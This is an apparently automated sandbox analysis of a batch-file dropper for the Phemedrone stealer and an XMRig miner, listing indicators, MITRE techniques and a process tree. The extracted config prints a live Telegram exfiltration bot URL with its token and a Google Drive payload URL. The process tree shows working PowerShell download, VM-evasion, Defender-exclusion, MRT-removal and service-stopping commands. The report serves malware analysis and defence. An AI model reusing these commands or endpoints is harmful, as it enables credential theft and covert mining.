phemedrone | 80b5ec95630e41ab434aa5173bf0e01d649c988c8a808f5c6dc9f5429ec6dea9

Analysis

max time kernel
146s
max time network
142s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
27-06-2024 18:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nursultan Alpha/start.bat
Size

330KB
MD5

4d51a6fcf1d1e0fbd616656feb5641f8
SHA1

c7cac69757bea9e7c820fce38f37d70ff08c146f
SHA256

2613a7f261d596639b1841cc59877b33d5027236b89ae6121f972625a504c48c
SHA512

7d06aebef47071ad253dffda6859849c9c473ba7b7a13079dfb0d758c9b4a468f875921993ae37d4cc5b1be5158102f263f29f1b04a2f84e0adef4f8b712650e
SSDEEP

6144:NgYR1+4N5cnf1HYyu9YgYj91ZfXzjIzK9LRzNPGua1q1qkH4oeO1CWVUNi9S9:NtYRY9a9DPzNYd1JkH4wbVs

Score

10^/10

phemedrone xmrig defense_evasion evasion execution miner persistence spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://drive.usercontent.google.com/u/0/uc?id=1uH0vQ_juAop0fqiOEIdPBdq1AMQmvndT&export=download

Extracted

Family

phemedrone

https://api.telegram.org/bot7087491532:AAFyJTUKmPdaQsSkA8bsrPF4ocXLBXAI-iI/sendMessage?chat_id=-4169712409

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral3/memory/2792-276-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2792-274-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2792-273-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2792-272-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2792-270-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2792-275-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2792-269-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2792-277-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral3/memory/2792-278-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1048	powershell.exe
18	2316	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1544	powershell.exe
2324	powershell.exe
1824	powershell.exe
1984	powershell.exe
1504	powershell.exe
1048	powershell.exe
2308	powershell.exe
2676	powershell.exe
2316	powershell.exe
1216	powershell.exe
2408	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	java8-update.exe
File created	C:\Windows\system32\drivers\etc\hosts	zrgqfbcavrkx.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 3 IoCs

pid	Process
2928	optionsof.exe
2088	java8-update.exe
1000	zrgqfbcavrkx.exe

Loads dropped DLL 4 IoCs

pid	Process
2632	cmd.exe
2632	cmd.exe
476	Process not Found
476	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/memory/2792-265-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-276-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-274-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-273-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-272-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-270-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-268-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-267-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-275-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-266-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-264-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-269-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-277-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral3/memory/2792-278-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
604	powercfg.exe
2228	powercfg.exe
2260	powercfg.exe
2216	powercfg.exe
1740	powercfg.exe
824	powercfg.exe
1636	powercfg.exe
2520	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	java8-update.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	zrgqfbcavrkx.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1000 set thread context of 2888	1000	zrgqfbcavrkx.exe	133
PID 1000 set thread context of 2792	1000	zrgqfbcavrkx.exe	136

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 9 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
2696	powershell.exe
2236	powershell.exe
2988	powershell.exe
2908	powershell.exe
1528	powershell.exe
2136	powershell.exe
1348	powershell.exe
1852	powershell.exe
3004	powershell.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1048	sc.exe
2368	sc.exe
2200	sc.exe
2040	sc.exe
1496	sc.exe
2196	sc.exe
964	sc.exe
844	sc.exe
2240	sc.exe
2480	sc.exe
572	sc.exe
1924	sc.exe
1392	sc.exe
2144	sc.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
600	timeout.exe
1824	timeout.exe
1128	timeout.exe

Modifies Internet Explorer settings 1 TTPs 26 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5144E551-34B4-11EF-B477-E6415F422194} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0fd7aefc0c8da01	powershell.exe

Suspicious behavior: EnumeratesProcesses 59 IoCs

pid	Process
2236	powershell.exe
2988	powershell.exe
1348	powershell.exe
1984	powershell.exe
1544	powershell.exe
1504	powershell.exe
1048	powershell.exe
1852	powershell.exe
2308	powershell.exe
3004	powershell.exe
2908	powershell.exe
2928	optionsof.exe
2928	optionsof.exe
2928	optionsof.exe
2928	optionsof.exe
2928	optionsof.exe
2928	optionsof.exe
2928	optionsof.exe
2928	optionsof.exe
2928	optionsof.exe
2928	optionsof.exe
496	powershell.exe
2088	java8-update.exe
1216	powershell.exe
2088	java8-update.exe
2088	java8-update.exe
2088	java8-update.exe
2088	java8-update.exe
2088	java8-update.exe
2088	java8-update.exe
2088	java8-update.exe
2088	java8-update.exe
2088	java8-update.exe
2088	java8-update.exe
2088	java8-update.exe
2088	java8-update.exe
2088	java8-update.exe
2088	java8-update.exe
1000	zrgqfbcavrkx.exe
2408	powershell.exe
1000	zrgqfbcavrkx.exe
1000	zrgqfbcavrkx.exe
1000	zrgqfbcavrkx.exe
1000	zrgqfbcavrkx.exe
1000	zrgqfbcavrkx.exe
1000	zrgqfbcavrkx.exe
1000	zrgqfbcavrkx.exe
1000	zrgqfbcavrkx.exe
1000	zrgqfbcavrkx.exe
1000	zrgqfbcavrkx.exe
1000	zrgqfbcavrkx.exe
1000	zrgqfbcavrkx.exe
1528	powershell.exe
2136	powershell.exe
2696	powershell.exe
2676	powershell.exe
2324	powershell.exe
1824	powershell.exe
2316	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	1348	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeIncreaseQuotaPrivilege	1552	WMIC.exe
Token: SeSecurityPrivilege	1552	WMIC.exe
Token: SeTakeOwnershipPrivilege	1552	WMIC.exe
Token: SeLoadDriverPrivilege	1552	WMIC.exe
Token: SeSystemProfilePrivilege	1552	WMIC.exe
Token: SeSystemtimePrivilege	1552	WMIC.exe
Token: SeProfSingleProcessPrivilege	1552	WMIC.exe
Token: SeIncBasePriorityPrivilege	1552	WMIC.exe
Token: SeCreatePagefilePrivilege	1552	WMIC.exe
Token: SeBackupPrivilege	1552	WMIC.exe
Token: SeRestorePrivilege	1552	WMIC.exe
Token: SeShutdownPrivilege	1552	WMIC.exe
Token: SeDebugPrivilege	1552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1552	WMIC.exe
Token: SeRemoteShutdownPrivilege	1552	WMIC.exe
Token: SeUndockPrivilege	1552	WMIC.exe
Token: SeManageVolumePrivilege	1552	WMIC.exe
Token: 33	1552	WMIC.exe
Token: 34	1552	WMIC.exe
Token: 35	1552	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1552	WMIC.exe
Token: SeSecurityPrivilege	1552	WMIC.exe
Token: SeTakeOwnershipPrivilege	1552	WMIC.exe
Token: SeLoadDriverPrivilege	1552	WMIC.exe
Token: SeSystemProfilePrivilege	1552	WMIC.exe
Token: SeSystemtimePrivilege	1552	WMIC.exe
Token: SeProfSingleProcessPrivilege	1552	WMIC.exe
Token: SeIncBasePriorityPrivilege	1552	WMIC.exe
Token: SeCreatePagefilePrivilege	1552	WMIC.exe
Token: SeBackupPrivilege	1552	WMIC.exe
Token: SeRestorePrivilege	1552	WMIC.exe
Token: SeShutdownPrivilege	1552	WMIC.exe
Token: SeDebugPrivilege	1552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1552	WMIC.exe
Token: SeRemoteShutdownPrivilege	1552	WMIC.exe
Token: SeUndockPrivilege	1552	WMIC.exe
Token: SeManageVolumePrivilege	1552	WMIC.exe
Token: 33	1552	WMIC.exe
Token: 34	1552	WMIC.exe
Token: 35	1552	WMIC.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeIncreaseQuotaPrivilege	868	WMIC.exe
Token: SeSecurityPrivilege	868	WMIC.exe
Token: SeTakeOwnershipPrivilege	868	WMIC.exe
Token: SeLoadDriverPrivilege	868	WMIC.exe
Token: SeSystemProfilePrivilege	868	WMIC.exe
Token: SeSystemtimePrivilege	868	WMIC.exe
Token: SeProfSingleProcessPrivilege	868	WMIC.exe
Token: SeIncBasePriorityPrivilege	868	WMIC.exe
Token: SeCreatePagefilePrivilege	868	WMIC.exe
Token: SeBackupPrivilege	868	WMIC.exe
Token: SeRestorePrivilege	868	WMIC.exe
Token: SeShutdownPrivilege	868	WMIC.exe
Token: SeDebugPrivilege	868	WMIC.exe
Token: SeSystemEnvironmentPrivilege	868	WMIC.exe
Token: SeRemoteShutdownPrivilege	868	WMIC.exe
Token: SeUndockPrivilege	868	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
932	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
932	iexplore.exe
932	iexplore.exe
1068	IEXPLORE.EXE
1068	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2632 wrote to memory of 2900	2632	cmd.exe	29
PID 2632 wrote to memory of 2900	2632	cmd.exe	29
PID 2632 wrote to memory of 2900	2632	cmd.exe	29
PID 2632 wrote to memory of 2816	2632	cmd.exe	30
PID 2632 wrote to memory of 2816	2632	cmd.exe	30
PID 2632 wrote to memory of 2816	2632	cmd.exe	30
PID 2632 wrote to memory of 2684	2632	cmd.exe	31
PID 2632 wrote to memory of 2684	2632	cmd.exe	31
PID 2632 wrote to memory of 2684	2632	cmd.exe	31
PID 2632 wrote to memory of 2904	2632	cmd.exe	32
PID 2632 wrote to memory of 2904	2632	cmd.exe	32
PID 2632 wrote to memory of 2904	2632	cmd.exe	32
PID 2632 wrote to memory of 2596	2632	cmd.exe	33
PID 2632 wrote to memory of 2596	2632	cmd.exe	33
PID 2632 wrote to memory of 2596	2632	cmd.exe	33
PID 2632 wrote to memory of 2236	2632	cmd.exe	34
PID 2632 wrote to memory of 2236	2632	cmd.exe	34
PID 2632 wrote to memory of 2236	2632	cmd.exe	34
PID 2632 wrote to memory of 2592	2632	cmd.exe	35
PID 2632 wrote to memory of 2592	2632	cmd.exe	35
PID 2632 wrote to memory of 2592	2632	cmd.exe	35
PID 2632 wrote to memory of 2988	2632	cmd.exe	36
PID 2632 wrote to memory of 2988	2632	cmd.exe	36
PID 2632 wrote to memory of 2988	2632	cmd.exe	36
PID 2632 wrote to memory of 1808	2632	cmd.exe	37
PID 2632 wrote to memory of 1808	2632	cmd.exe	37
PID 2632 wrote to memory of 1808	2632	cmd.exe	37
PID 2632 wrote to memory of 1348	2632	cmd.exe	38
PID 2632 wrote to memory of 1348	2632	cmd.exe	38
PID 2632 wrote to memory of 1348	2632	cmd.exe	38
PID 2632 wrote to memory of 1984	2632	cmd.exe	39
PID 2632 wrote to memory of 1984	2632	cmd.exe	39
PID 2632 wrote to memory of 1984	2632	cmd.exe	39
PID 2632 wrote to memory of 1544	2632	cmd.exe	41
PID 2632 wrote to memory of 1544	2632	cmd.exe	41
PID 2632 wrote to memory of 1544	2632	cmd.exe	41
PID 2632 wrote to memory of 2164	2632	cmd.exe	42
PID 2632 wrote to memory of 2164	2632	cmd.exe	42
PID 2632 wrote to memory of 2164	2632	cmd.exe	42
PID 2632 wrote to memory of 1924	2632	cmd.exe	43
PID 2632 wrote to memory of 1924	2632	cmd.exe	43
PID 2632 wrote to memory of 1924	2632	cmd.exe	43
PID 2632 wrote to memory of 1004	2632	cmd.exe	44
PID 2632 wrote to memory of 1004	2632	cmd.exe	44
PID 2632 wrote to memory of 1004	2632	cmd.exe	44
PID 2632 wrote to memory of 1496	2632	cmd.exe	45
PID 2632 wrote to memory of 1496	2632	cmd.exe	45
PID 2632 wrote to memory of 1496	2632	cmd.exe	45
PID 2632 wrote to memory of 1504	2632	cmd.exe	46
PID 2632 wrote to memory of 1504	2632	cmd.exe	46
PID 2632 wrote to memory of 1504	2632	cmd.exe	46
PID 2632 wrote to memory of 2520	2632	cmd.exe	47
PID 2632 wrote to memory of 2520	2632	cmd.exe	47
PID 2632 wrote to memory of 2520	2632	cmd.exe	47
PID 2632 wrote to memory of 600	2632	cmd.exe	48
PID 2632 wrote to memory of 600	2632	cmd.exe	48
PID 2632 wrote to memory of 600	2632	cmd.exe	48
PID 2632 wrote to memory of 1204	2632	cmd.exe	49
PID 2632 wrote to memory of 1204	2632	cmd.exe	49
PID 2632 wrote to memory of 1204	2632	cmd.exe	49
PID 2632 wrote to memory of 2976	2632	cmd.exe	50
PID 2632 wrote to memory of 2976	2632	cmd.exe	50
PID 2632 wrote to memory of 2976	2632	cmd.exe	50
PID 2632 wrote to memory of 408	2632	cmd.exe	51

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2632
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:2900
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:2816
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:2684
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:2904
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:2596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2236
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:2592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2988
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:1808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1544
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:2164
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:1924
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:1004
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:1496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1504
- C:\Windows\system32\wscript.exe
  wscript /b
  2⤵
  PID:2520
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:600
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:1204
- C:\Windows\system32\doskey.exe
  doskey CD=RECOVER
  2⤵
  PID:2976
- C:\Windows\system32\doskey.exe
  doskey TYPE=ROBOCOPY
  2⤵
  PID:408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1uH0vQ_juAop0fqiOEIdPBdq1AMQmvndT&export=download', 'C:\Users\Admin\AppData\Local\Temp\java.rar')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  PID:1664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1552
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:2392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1852
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:1340
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:1948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  PID:872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:868
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\start.bat"
  2⤵
  PID:2888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2308
- C:\Windows\system32\doskey.exe
  doskey TITLE=RENAME
  2⤵
  PID:2796
- C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\assets\UnRAR.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan Alpha\assets\unrar.exe" x -p1512okul -o+ "C:\Users\Admin\AppData\Local\Temp\java.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
  2⤵
  PID:2812
- C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe
  "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2928
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2928 -s 1796
    3⤵
    PID:1828
- C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe
  "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2088
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2120
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:484
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
